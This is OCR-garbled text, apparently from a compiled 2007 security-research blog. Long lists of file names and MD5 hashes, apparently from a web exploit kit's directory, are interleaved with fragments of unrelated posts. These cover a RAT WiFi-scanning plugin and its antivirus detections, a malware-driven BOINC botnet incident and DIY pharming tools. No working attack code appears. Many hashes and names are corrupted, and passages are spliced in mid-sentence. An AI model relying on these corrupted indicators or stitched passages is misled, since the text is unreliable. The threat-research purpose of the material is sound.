f2946a58a93f63303c47d649617e03be 
fr.gif 
0a4673b07b377d1f58230f40f256d890 
ga.gif 
6023ba4847dd1329d210f687c63458d5 
gb.gif 
5f1b63912b5b84a73895a8ad21004209 
gd.gif 
282a476bceb7bdbfc19a47d68a0efc18 
ge.gif 
a04177e4b34a23dcbf0e8a64838b4619 
gh.gif 
e72c4c18615e958e05dcc12364fe6527 
gi.gif 
2ca6d3fcbabb4b5dc430c8a552d7fbl1lb 
gl.gif 
edcdeb38a22b784f2c19f76f2af37d39 
gm.gif 
bcfe045327c84129e7d8118d9a7a5524 
gn.gif 
918580fdb7cd4df14d4805b9ac95f82c 
gp.gif 
15cfled243475f743fbd95813985724b 
gq.gif 
d7bef30dfa3e2ee2b6blea84eab0d047 
gr.gif 
d26600ec24ea1cd62a3042d1d68f2ac4 
gs.gif 
e3cO0ab08adb27ea01a370f63926f232e 
gt.gif 
65511daa32c81a3eb2fb925e15101687 
gu.gif 
Obde69cee1c5862dcb000c6848d84273 
gw.gif 
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162a7157154d909cd81bdc6632ecbc63 
gy.gif 
71a4f19942ccd37df09fa813943e5fee 
hk.gif 
692eea40bfOb08bac50f9785a843cb5f 
hn.gif 
cOe00f96daf73bd2bea3ad87c63aede2 
hr.gif 
825a4f07cfe3bf652ele9ec72ee26f14 
ht. gif 
92a6d557dladf362160e3bd0d774ecb7 
hu. gif 
d543f5932e461ef6b04c070a63ccd151 
id.gif 
6f27ba21a22aa1486b568aa200d6c73c 
ie.gif 

7492487 4aa60e9fda9d94dcb892e322a 
il.gif 
44d2cc7e87c0f39eda33a43234d75afd 
in.gif 
46e1776549c9bb866ae7b18f9d847b0a 
io.gif 
f6c43cf9bc8365d50b65019f9fc543d7 
iq.gif 
a4bd28a6c543211dacb5ce3e18e96846 
ir.gif 
6456dc4dd3745e2c84c13702eeb87844 
is.gif 
347f6ff824ac5e7a31fc549811c9aac7 
it.gif 
7b2fba7a5df93ea5980e1d46409642b2 
jm.gif 
98ea05ee62c0d4462f902b108b046439 
jo.gif 
ac7a3elaace29eb636ed41332b4c68ae 
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jp.gif 
b6fa87814a6e40fcdf41d79c5e06c406 
ke.gif 
6592c34b8a16505388c21e99508e580b 
kg.gif 
385d842f1918453025966751d5b55 1bf 
kh. gif 
2a0042042f0d6feea0c435f9833b1bd4 
ki.gif 
b01814ad07dee8bc4be5d3038cc8b6b5 
km.gif 
258ef6e0c4f69ba726277a93a51dac56 
kn.gif 
f23fe3a61lad0d78bb69c25711leeb249f 
kp.gif 
f45a650bf92b6ad6552bf618d2ffe75d 
kr.gif 
53ca55d29130501b6cd57b98f169701f 
kw. gif 
48d87006385685ae24764c0d9b595d9b 
ky. gif 
4d159d20cf64b712700756d32cde64ee 
kz.gif 
9faa30e94f43918d74d09b3eaaec6933 
la.gif 
334d5527bcd7e6901a6b729e632683df 
lb.gif 
2¢3675c6a47325a4d2445e50afc929ae 
Ic.gif 
7a5699234ec597d0bc927e6dbfae579a 
li. gif 
239e66bf39e8052587b504515a21f03b 
Ik.gif 
8f906d20bf8ab9749e19958ad60e1584 
Ir.gif 
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21cd61ee215e4b0147ab4320822cf2fc 
Is.gif 
68af1c3f00b31ef072c99d95fa453ff6 

It. gif 
017aa4fbed00bfd848fb021462c296e2 
lu.gif 
230678f649c90589bf40024bd9ffa294 
lv.gif 
2eb690flaf034a71573641bfcfcf603e 
ly.gif 
72a42cca81f2e81dc65d9dd6f772cd56 
ma.gif 
ad81d516864533d1869ed296603f6e7e 
mc.gif 
3322300de4324fde3ee51d3d4431dc00 
md.gif 
7a363edf7896c044c1031a4c2f78110a 
mg.gif 
8adcOf5fe9c73b87cd50d4fb49485ccc 
mh.gif 
cdfdd26cff13006fd5a7f3bcf433cba0 
mk.gif 
b8eaaa78b588dc5a78a213b665c3f41d 
ml.gif 
14bad568cfb82dde31fld59eafe5f633 
mm.gif 
f0d6434e55addacle1e0e9b43274c14a 
mn.gif 
df21fe047bf3840629594af786c510c5 
mo.gif 
04bb90bdf2614d372dec56449e912596 
mp.gif 
cac8345e9b3e072169bb833244ab68fd 
mq.gif 
aa80ab7a73d808d7b3570868cdc3d1fb 
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©) WiFi Scanner ; -(O) x| 


Device 
Intel(R) PRO/Wireless 39454BG Network Connection 


Stop Scan | 
SSID MAC Addr [Signal | Mode | Channel | Rates (Mbps}_[ Encryption | 


B2 private_8B 00-01-38-7C-AB-04 -60dBm Infrastructure 11 (2462000kHz) = 1. 2,5,11. ‘Yes 
00-14-7C-4E-74-F6 = =-62dBm Infrastructure 11 (2462000kHz) = 1,2.5,11, Yes 
Andersson 00-14-6C-21-C4-8E  -87 dBm Infrastructure 6 (2437000 kHz] 12,5: FA. No 


Distributed computing through malware, OSINT thought botnets, distributed password crack- 
ing and distributed malicious economies of scale - are all fully realistic nowadays. And so is 
a plugin for a popular RAT which is scanning for open WiFi networks based on an [2]article 
released by the inframous 29a group : 


"This plugin enables you to scan for available nearby WLANs. The bins (wifiC.dll and wifiS.dll) 
have been packed with UPX 3.00w. Place them in the \Plugin\ folder or load wifiC.dll manually 
to use the plugin." 


Perhaps this is the perfect moment to comment on Maureen Vilar’s email, a moderator for 
[3]ClimatePrediction at BOINC’s project who contacted me regarding my [4]blog post on 
distributed computing through malware, and described the incident in details : 


"The 5000+ computers attached to Wate’s account were very different in profile from anormal 
DC farm and easily identified as abnormal. Attached computers are now being looked at by 
members much more critically. It now appears that the trojan that attached the computers 
to Wate’s account and thus to boinc projects was probably bundled with P2P downloads.The 
owners of the 5000+ computers must not have scanned these P2Pdownloads, and many of 
them must have failed to investigate why their computers were probably running slowly at 
100 % CPU, or in thecase of laptops why they were in some cases doubtless overheating or the 
batteries running down. They must also have failed to check which programs were installed, 
even though many of the affected computers cannot have been running normally for everyday 
use. Imagine that many of these computers did not have an active or up-to-date firewall, or 
that firewall warnings were ignored. These were all basic security failures on the part of the 
owners of these 5000+ computers, some of which were powerful machines. The developers 
of legitimate software unfortunately cannot ensure that all computer owners worldwide imple- 
ment basic security measures. The problem of Wate’s account was first discovered by boinc 
team crunchers in Italy who took speedy action to inform the boinc development team in Berke- 
ley. They in turn took rapid action to inform the administrators of the affected boinc projects. 
The Wate accounts on all the affected projects were disabled. Because boinc projects run a 
competitive credits system, it is in the interests of members to ensure that no-one is able to 
compete dishonestly." 


To sum up - The BOINC’s servers weren’t breached and malware "pushed" into the participants’ 
hosts through BOINC’s client, instead BOINC’s client got "pulled" from the infected PCs, so 
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mr.gif 
08c96ea87ff559d6dc6b4605fcbcfe40 
ms.gif 

d6a0a5e447 2ffd96e7d4c7c8d91led2b2 
mt. gif 
dc7aQaeb0f7280435a328cadce598b8f 
mu.gif 

9869ea3 1lcbf8d3f2d1f42824122b61dd 
mv.gif 
9827918f9646eaa08854d45bef7ea093 
mw.gif 
12b2a62fae9c618544a56fef3d687306 
mx.gif 
7211e357363beb1da21ce32593b4f5a8 
my.gif 
51479ef74dfd0b2006983b6b9bff3d91 
mz.gif 
4b938aa9c776ea29cfOb51fb48f1767a 
na.gif 
a417cfe920429e7af07a98ea51aa22a5 
nc.gif 
2135f0fb410b2f0767a7b534c753b848 
ne.gif 
489f6052b3d124a6607d4cb6a00022e1 
nf.gif 
9f851132acffal724a697ada9c539ff8 
ng.gif 
5ddf086d424340d2cd9al18e0f9c20ff9 
ni.gif 
bb8200af164d5a73758fa5822fbacel0 
nl.gif 
82994b14a5992b5a3539b9c0a789297¢c 
no.gif 
bbc9011e876a122ea89923e6b730ec50 
np.gif 
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07dcfcc7ade4117c8f5d908101c22328 


nr.gif 
2a73be7cc4c7ae728e53748f07ce5b07 
nu. gif 
d7ad59b643ac9e8ecfe2193d37d08dc4 
nz.gif 
5809a037a53791f4632ed2756adf966c 
om.gif 
72045d2de14bc2f0b04b3cddb3c93892 
pa.gif 
192c84595d7ffb76229892030e08e37f 
pe. gif 
983af8b4835a96641f85449f2779a831 
pf. gif 
53c0188190e727bd3ea04778b4e83a9d 
pg.gif 
c0e201f4833b5bb6fe8ac014162ad8d9 
ph.gif 
0630367a44279677e4bff7f09dc820e8 
pk.gif 
fe878d940e0e3030c7258feca05b2ebf 
pl.gif 
279fd88ddc4abbd4d808a087b653ea24 
pm.gif 
c74a19a09019278029760d4381e/7fa8a 
pn.gif 
997fbcf797457e2658d8f6df066cef78 
pr.gif 

a48b8 labee4dfc5f36947006b603747a 
ps.gif 
bf9849158592502d0e12ce36401d1925 
pt.gif 
b68938af019e2c74377327abbe3d4b5e 
pw. gif 


a19c54b3a802fa6ba217099df5c4659b 
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py. gif 
bef5b19a0555c6b85fa8f46055e019c7 


qa.gif 
8de77aa8a0a825346fac6d29837c2449 
ro.gif 
8569e94e81a39bbb43ed8445d1a92dd5 
ru.gif 
addac471b8ddc26a9f1f2fa235330d80 
rw.gif 
26c4bdfd43b5d836acd1dfdeaffa4cf4 
sa.gif 
94c55d70da8c458459597aa1d9b60112 
sb.gif 
76cf18354aa71695e488923f516fc23c 
sc.gif 
65c089b927687a801afd75528flb6def 
scotland. gif 
ffd4426704720dc580138a55a86e5d9c 
sd.gif 
983179ead3080585811d73e729e678al 
se.gif 
cf357235e945172661d7ee5fde26f909 
sg.gif 
2a46e9e31359baaeb4e6ab4b0b950961 
sh.gif 
041dff1f55c07bcda4f53a75be64af18 
Si.gif 
b796cc14ec4516ae9098e57a7c391dab 
sk.gif 
ffac49f21971212d048422d36a555d50 
SI.gif 
dfea6e55c87213abcca8e95ecca/00dd 
sm.gif 


59f434ebf3668c85d1fbbffa751fff6e 
sn.gif 
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379caf2d23ed870f9e0239ba93ee7551 
so. gif 
e1d51439b1153ae38776553a7bcf10d0 
sr.gif 
4e5415a5e3fbf7496007249478c12276 
st.gif 
6596dc6cdeed9b4979fbb5c7609e66f5 
sv.gif 
e€3479c1d5ac76b8b7dcfb709cfd0083e 
sy.gif 
d86f69a9267f00e11030246c36109bc5 
Sz.gif 
5d7b57a0a5883abcc3fe28c1d4b2dfld 
tc. gif 
0e5370c94999fb37c1a730337f431f50 
td.gif 
2782b3d0blab6eaa48d091fc938b97c6 
tf. gif 
9elaf29a601960b84f90fb2efacb9bd2 
tg.gif 
ece0a5d9d0ffa8662f66a37c667e9538 
th. gif 
a4be77cc567463a6ab33df47a6471f90 
Thumbs.db 
c38b33f4ce4b895bd044500a5eal1f516 
tj.gif 
9b1b0ecd454b7ccad12431a2a0281914 
tk.gif 
c895d3c66ec3cf659b59d854cele0e9a 
tl.gif 
9e79c92f60fb33cbb83addf04c64c789 
tm.gif 
8453e36426a3acba26bac199c92fb095 
tn.gif 
30245ac4122c61accb380e162691f431 
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to.gif 
ecacff3913a318a8556ed4dd7a6582a7 
tr.gif 
3c7e51066bea641449722616fdce2d21 
tt.gif 
5715707d79f5a81c9686c593f65f2e80 
tv. gif 
4a0b50aa81de8101f281a3d6dfbc4aal 
tw.gif 
c6da9ab7f3bfe2fd202e993b99aa9158 
tz.gif 
6af3860230e7cc1b12049731a95f4e4d 
ua.gif 
acc1cf561309691198e59e23c9840d13 
ug.gif 
e29af593a8eacb68e81755c78a7dbf19 
um.gif 
8346f478516f733a68c500410fd57159 
us. gif 
4a0cdce756ed771a5d9a16114179d5e7 
uy. gif 
74786429627d504ad3d36b0c4a40a638 
uz.gif 
2eefb9f89353a9554188dc522d07c68b 
va.gif 
6f64ebd984e71e113042dfb5b5dfbd73 
vc.gif 
cf4329d0flda7924b3eecla0f725ce45 
ve.gif 
e067f0c4fbaa5ed99477581e86630faa 
vg.gif 
8510bbd7fc9843b558424ac411992732 
vi.gif 
6ab52e66bdf59c0826bb205307eec76a 
vn.gif 
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66364a250886c943e1f40fb0762c0a63 
vu.gif 
269340d3432e0bf04aa2d20b1916d723 
wales.gif 

7402 7bf2c92ffb8d744e09a72467bf36 
wf.gif 
321ff7ca69712a9af5405291f972dd0a 
ws.gif 
32ac83d94d72fc5abb59dc917a07fc72 
ye.gif 
743f4826f90f1ccdf9400d100da04ae7 
yt. gif 
b8c20446453d8057fcc73db427ab9f9d 
za.gif 
c8d80912d6a8a8fc94cb856871a864cb 
zm.gif 
88d75c077c65a544c5676bc35eb3f6r4 
zw. gif 
fd5cc25e0cea7e07b0be89c5452c546c 
sort tables.js 
ed6525437174280ea6bb8e9cd4113c56 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
core _config.php 
d6272f9bf8c04b97a3a577917f95cd8F 
core functions.php 
ae08555fa4d377356f52d8edaf48db40 
core geoipdb.php 
895b7e5b604c9ea5af0044e16851cel19 
core googlepr.php 
14d383efeb7a6eb74e739d98f80eab6cb 
core _obfuscator.php 
742e0f91315045f2fc53bb4fcef2deac 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
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admins.php 

banned.php 

banneddown.php 

browsers.php 

exploits.php 

ignore.php 

langs.php 

mystat done.php 

referers.php 

systems.php 

«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
browsers _old 
9f0f0359e2ddb134f6956af5e0628c6c 
systems _old 
eddcal158e795a8afebe3177e7199b1e8 
«htaccess 
837c9ffb7faf837ec57cb2c7e6d43c0f 
add _ignore.tpl 
361a727cc4a43adc42dea9b958bf98Ffc 
ban.tpl 
76ac9ff593e95f3fdcf6b38b8d85ce9b 


body.tp! 76ac9ff593e95f3fdcf6b38b8d85ce9b 


browsers.tpl 
4196ad0a18f6ab93239b1fd869920afc 
check.tpl 
O8beca2da5b4a0bb3d8ac053410ae231 
clear.tpl 
74e77cala3d992dc11b0ff8b7319ef50 
configure.tpl 
ade6db8d674df913a5ac4a0720e9e8bc 
exploits.tpl 
6f53b7639bc59c7a27fc5b8a38f7d621 
exploit body.tpl 
76ac9ff593e95f3fdcf6b38b8d85ce9b 
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geterror.tpl 
623b11547c8f492f226b235643c6b268 
header.tpl 
bf523dde3a527c1d7007302b803a2d5a 
header _table.tpl 
954c5d5deabf4a76la6cfaad66d6e7b3 
header title.tpl 
b9eb1f12777fc465bb758d2b434f5a6c 
iframes.tpl 
el6aaldb8fel5aaee09c3d44badf2f77 
iframez.tpl 
0f79953d11a9353f09d5bf975d723f0d 
ignore.tpl 
b0b2eb931f1319846d56be91bea9bd3d 
languages.tpl 
886943648cd9cbeb0f57bc6f6c79495f 
languages listing.tpl 
6e379ff19bcldc4e83fdca2cac414c95 
login.tpl 
2160d523fe97ff5da964cae7458f2cfb 
navigate.tpl 
elfe9c8c5ec4f49e916f0c1lcbc7c9dal 
referers.tpl 
bd1fbd98cb4448179478cb57202bf543 
referers _listing.tpl 
2fa44891db7eaef670db810155el1ca9 
statisctic.tpl 
47c6ca0c45285d616cd945de6870a8d1 
systems.tpl 
5ff3608516fd33628d4b15184484d1d2 
upload.tpl 
a917d4b48e8c452852bb010030a52615 
codes.php 
1b6a8b96c52e5d3847c4dfbc79188ebf 
index.php 
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15de933d18d831ffffd13352483d2945 
index _winopen.php 
d572b25ebfa3db3b1bb974e3be0a5aab 
ip-to-country.csv.txt 
82a6cfacd4699f088ab5128ea88ff262 
_country _install.php 
3bbf3c830b55aadebbdef3795408f925 
admin.php 
de9995478cb0abc079dafe24a6b5bd70 
chm.chm 
daeaccfd929a1d9a5f424ed080e73fc0 
hta.hta 
c6700ed5bc72f4d579ded4a3aeeb8013 
jar.jar 
40b05dc3ff641464e669da9008144a6f 
ReadMe.txt 
445aca6e5f4d51db96eb84456008324b 
ReadMeENG.txt 
8893842639a272166986cf63ba2042ac 
_dat _install.php 
bf4167e670c42f840162077e9f3ec76b 
chm.chm 
daeaccfd929a1d9a5f424ed080e73fc0 
logo.php 60129d7765ffdc899aclad9ab5c8dd0e 
hta.hta 
c6700ed5bc72f4d579ded4a3aeeb8013 
htm2chm.exe 
8e30ffbd9ab1lebb6220c160023338643 
htmlcompact.exe 
b4801cc863c8f26a168e63b2085fae2f 
htmlcompact _serial.txt 
€62795c8b4bc9450e838eb71db4d7a5e 
context.php 
9a0364b9e99bb480dd25e1f0284c8555 


counter.dat 
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b64d80c3cf4388d3fce68a7a4faal 9df 
log.dat 
5814440e9a7640b2a0f3182c16b22691 
«htaccess 
7977f3cff06450391f72700c77dbdecl 
count.php 
e161e0393783f211a3a81d31a00a8eab 
dump.sq!l 12e9a6b5d0203c4b150b1350a59c5dcO 
getexe.exe 
9cd2c4c2c348aa019a041d86d282c2e0 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
history.dat 
0aal7ec194f286cddf864a9a5dbe5948 
file.dat d4f148ab9a4299e5d3191db046256e25 
history.dat 
40cd750bba9870f18aada2478b24840a 
opt.dat 
f2ecda26d35c7999114fc323eefd8778 
prcyhg.dat 

bad.dat 
a69e4700c7a8655f135bb8eca42bd7da 
good.dat 

iframed.dat 
€812d0855b6423679d7759bb77d4140a 
iframes.dat 
36ddfb830calle20b64ad1b6650aca33 
jobcron.dat 
92426dd4a47a0cdc43528d41dc763be5 
jobdef.dat 
998b864500d3414e7a9021e88b57c386 
jobnow.dat 
6c94c2bcd6d6eb991e0e869ce38aa52a 
lastlog.dat 
fa130a4903917b3e678cc8e469b969a8 
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they started participating in ClimatePrediction. And obviously, they have anomaly detection 
practices ensuring such incidents get easily detected. 


Detection rates for the WiFi plugin : 

wifiC.dll 

AVG 2007.08.23 BackDoor.Poisonlvy.B 

Ikarus 2007.08.23 Trojan-Downloader.Win32.QQHelper.vn 
Webwasher-Gateway 2007.08.23 Win32.UPXpacked.gen!94 (suspicious) 
File size: 198144 bytes 

MD5: 15cbfaled47e45f30be0eb0dcdlec5e3 

SHA1: bdd9994a20b4ae753951c09506ae0e2db59f63e2 


wifiS.dll 

AntiVir 2007.08.23 BDS/BlackH.2005.A.1 

AVG 2007.08.23 BackDoor.Poisonlvy.B 

Panda 2007.08.23 Suspicious file 

Webwasher-Gateway 2007.08.23 Trojan.BlackH.2005.A.1 
File size: 10240 bytes 

MD5: 11aa54103e7311ad23b4e60292dc9e82 

SHA1: 59e7f0aaa8305ad0c5c830c16b531d1e2ab641b4 
Consider the following scenarios : 


- malware infected PCs actually opening a WiFi connection in a port-knocking nature to the 
wireless botnet master only 


- no need for wardriving, as malware authors would quickly map the entire WiFi vulnerable 
population around a given region in the age of malware geolocating IPs using commercial 
services 


- once a PC gets infected inside an organization, it can automatically turn into a wardriving 
zombie exposing vulnerable WiFi connections within 


- Bluetooth scanning plugins expose even more vulnerable Bluetooth-enabled devices in the 
range of the infected host 


1. http: //users.tkk.fi/%7Elauronen/works/hakkeri_2003. pdf 

2. http://hyatus .newffr.com/TAZ/_VX_/vxmags/29a-8/Articles/29A-8 .018 

3. http: //www.climateprediction.net/user_week/user_of_week.php 

4. http: //ddanchev. blogspot .com/2007/03/distributed-computing-with-malware htm 
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notifr.dat 
717cffb49e8686dfalc4f19bceb88b28 
reserv.dat 

status.dat 

c95ee9ed5c7fab7 8f2be9ffa31fcOf5e 
temp.dat 

timeout.dat 
402a3c33df3afe33b20101bc525773f0 
trash.dat 

uncheck.dat 

404.dat 
€937ab7561f20d8baf5e846c849ee6dc 
suspend.dat 
bfeb8e6b1717db53d8a35a6cf78f1d18 
x1.php 
d2c9d7260bdc6094b88265a6b8ed3e74 
x10.php 
5692af4ca227b6673298e90d4c9bfcbe 
x11.php 
4e45187bf18490bccc42d176c0998c21 
x12.php 
a383185d00e085e7f24f9e9c567bb4ff 
x15.php 
49c9ce55b9f5331045104d44daab6256 


x15b.php ceca2026fb3f9496a626f45ff23b8e67 


x16.php 
7f5d360b45d40511fab3c6falec0027a 


x16b.php b989d8a228054378f95d291b5bdfc781 


x2.php 

19974fecf68485 7a37529e035b758887 
x3.php 
631leac40acde9e79dcaa5ce00df0c89a 
x4.php 
da7a2b607b26e1b5c99af0fb07fc8b2e 
x5.php 
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9e486a60d671efd7733aede4c09b78f5 
x6.php 
fabfflae5421e75f2656a4f50445673c 
x7.php 
b3ac92d86bbc0699c9a7aa97d9668bcb 
x7b.php 
af7cda89e3calfed306f4bd06262e0ca 
x8.php 
338089761d48a58945b696e96ab6ae55f 
x9.php 
97b028a7a52e84b5abc5b2aa8c91e472 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
crypt.php 
82050953577b7a412d0e3c5f2f53805e 
GeolP.dat 
fa685d37c5702689745d44f6bc89bd07 
geoip.php 
79ef9767b4da66fc77ab67dfeaaf78b6 
mysqlcfg.php 
91ff25dale665dd2f9flbc8e90442bad 
prcy.php 85a12cec68b241f36874a66b3375114c 
prcy _alter.php 
b7fa4f8e530981418e8eebf1696e6a0f 
titles.php 
b07085df5668a3b100c5ff519959ae82 
actions.php 
58b3b0fef8b72ca592f4d978de060243 
cleaning.php 
2cdd959f026881¢c5c3713819f17324d7 
countrs.php 
894c155ea0864a0d5b284030fea332b6 
details.php 
5878157d7e18dafd999e35751a85c19F 
exploits.php 
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3f5aefa4c94d5f2eb2b31eecd8c46912 
general.php 
9d2ca6ceccO0bbc2c7986175e9dd0ef7 
history.php 
a4cf94ed4ac99f5182a9dad8cbe21f83 
index.php 
bd7283318f51e004196c934a7eed1bb4 
mainten.php 
3c2c6072ea71054ff4135e5492eb19db 
referers.php 
600c7b3b74671d113240778237d59ffa 
summary.php 
f856abaee5606301bd8f60ab251748ea 
traffic.php 
b8f72c1738947c257fd0ae8a9eb5857b 
useropt.php 
74d4046f5b8b7879fa284e481f37b634 


users.php 
f04df89f4d96711ca8f987c76e6bcbec 
Thumbs.db 
981314634ddd95381a566027e4b113a5 
tornado.gif 
7b46b54fe91ce828270680272a04ac87 
0.png 
7174b474d5c1b02516e0746600d0c546 
1l.png 
637d93b8eeea8baace2fccec85211953 
10.png 
fa89fcebb5364490b01a82d307a2dbff 
1ll.png 
cac46eee4aa893b80bd9a8baele50423 
12.png 
c58f2119163a48614ad88fd84b09546f 
2.png 


bd6e668e1fb1b42650ab4fa5f3e78601 
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3.png 
3cccd5cb37aee00ab99022197a65e6d1 
4.png 
b903f98e797437aal8fbe37b2a069e22 
5.png 
df08a3353c7f7417b68c4aa466804aea 
6.png 
4e4068cf84fca3e714183f0f8cb4daf3 
7.png 
05e06928335fb3dfbac897fb68a666d4 
8.png 
7092806d2f12ae7a0fad364d5352f8b8 
9.png 
13483bb587b8876984979467ebd2b8ae 
Thumbs.db 
54d728fe9ea098e65757c2ab3ccf4e05 
-.gif 
d12bacb6e3a0bfalb51fc279dbea515c 
al.gif 
38dbd288620c801ea083139b4eflcfc2 
a2.gif 
38dbd288620c801ea083139b4eflcfc2 
ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae. gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af. gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag. gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
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6a2e3d4ac7139f1665ec85daf905c4fb 
an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8cC7f929 
ap.gif 
38dbd288620c801ea083139b4eficfc2 
aq.gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as.gif 
e56e28dec792c71b32cb7299ebd83751 
at.gif 
cadc74036384cda59ee91d99bdcfdd69 
au.gif 
b91b6739c8107e29680568ef8ff952f9 
aw.gif 
8e91812abcd372b3a32e7c16c15dd8ed 
ax.gif 
38dbd288620c801ea083139b4eficfc2 
az.gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb.gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be.gif 
e2697c0d2f33f4c8ca85dac762734cfc 
bf.gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg.gif 
f6e51fba28e2744b678ffd752d75f945 
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bh.gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 


bi.gif 
fe5f4500cf4baefld65a424e8d5689bc 
bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
bn.gif 
43948655b170b8e063f023620d97c76b 
bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c5lbaed8e6a7 
bs. gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 

995226c86da889b7 7ee9fa9c60bee399 
bv.gif 
e023614ca4df2ed1be0dacf9f736826a 
bw. gif 
d4232256a8374cff569021c5351301be 
by.gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz.gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd12ecd11f 
cc.gif 
38dbd288620c801ea083139b4eflcfc2 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
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62a3129d39d66d648580fbeef1lfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck. gif 
edafceaaf10f5f387523fd27915628e7 
cl.gif 

65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
c5fa3319590501d12afd4e16b4ed81b0 
cs.gif 
952b2c82b24265f4100538989299dc1c 
cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cx.gif 
38dbd288620c801ea083139b4ef1cfc2 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz.gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de.gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk. gif 
8337faebf55a6e5b297aff95517147a9 
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dm.gif 
6f33e31ac969168d9431cc865001a21a 


do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec. gif 
6d213134a8af6250fe5b269d16b52967 
ee. gif 
3e3f7d30e9e58b2c98f6f5d7f7bel64c 
eg.gif 
9600de10fc4779b7873d463e4a5188e9 
eh. gif 
38dbd288620c801ea083139b4eflcfc2 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et. gif 
737dc12da78a0b27b999544a41b8c954 
eu. gif 
6a257a89ee638d66865664ee968ff7 2c 
fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo. gif 
adc678b55el16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
fx. gif 
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38dbd288620c801ea083139b4eficfc2 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb.gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge.gif 
ac87f86413d9e214be3de0d3820cfla7 
of.gif 
38dbd288620c801ea083139b4eficfc2 
gg.gif 
38dbd288620c801ea083139b4eficfc2 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
cee23846c8603623882ed5134406806c 
gs.gif 
38dbd288620c801ea083139b4eficfc2 
gt.gif 
9b5e92154496a88f1cal0648454977af 
gu.gif 
d8ee6ee605a30ddadafb179000fle62b 
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gw. gif 
7008cdb584b4983fbf7458de392f3b82 
gy.gif 
e0745abf42d852da0588adeab822c002 
hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
hn.gif 
99b20f53c38c2f36de5677946e7cb042 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht. gif 
99b88b35b9310162500f187da64b579e 
hu. gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il.gif 
ce092caal539ae185ae407fbc543cd5c 
im.gif 
31a602ae1723a9e5bfffc3304c15287e 
in.gif 
3f042¢528c4bf957777be35f6b18c691 
io.gif 
35b9c8f05cObce96ae295cd97997bb43 
iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it.gif 
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3.8.18 DIY Pharming Tools (2007-08-25 23:47) 


La flo 


In a previous post | discussed [1]pharming from the perspective of [2]abusing a DNS server 
and starting a wide-scale pharming attack. However, it’s also vital to discuss the second per- 
spective, namely the malware infected PCs whose hosts files could be abused to faciliate MITM 
phishing attack for instance. Consider the following DIY pharming tool that basically allows 
a list of anti virus software’s update locations IPs to be added, and consequently blocked, as 
well as complete take control over the infected user’s perception of where exactly is she online. 
The second version is lacking the "add a list" feature, and is entirely phishing attacks centered, 
and the way lists of the process names/files for every anti virus software have been used by 
malware shutting down the software, in this very same way, the online update locations for 
multiple AVs are also easily obtainable - a topic | covered in [3]a previous post. 


Panda 2007.08.25 Suspicious file 


Prevx1 2007.08.25 Generic.Malware 


File size: 623616 bytes 


MD5: 4ab0d055bee708dd0046af0b8800594a 


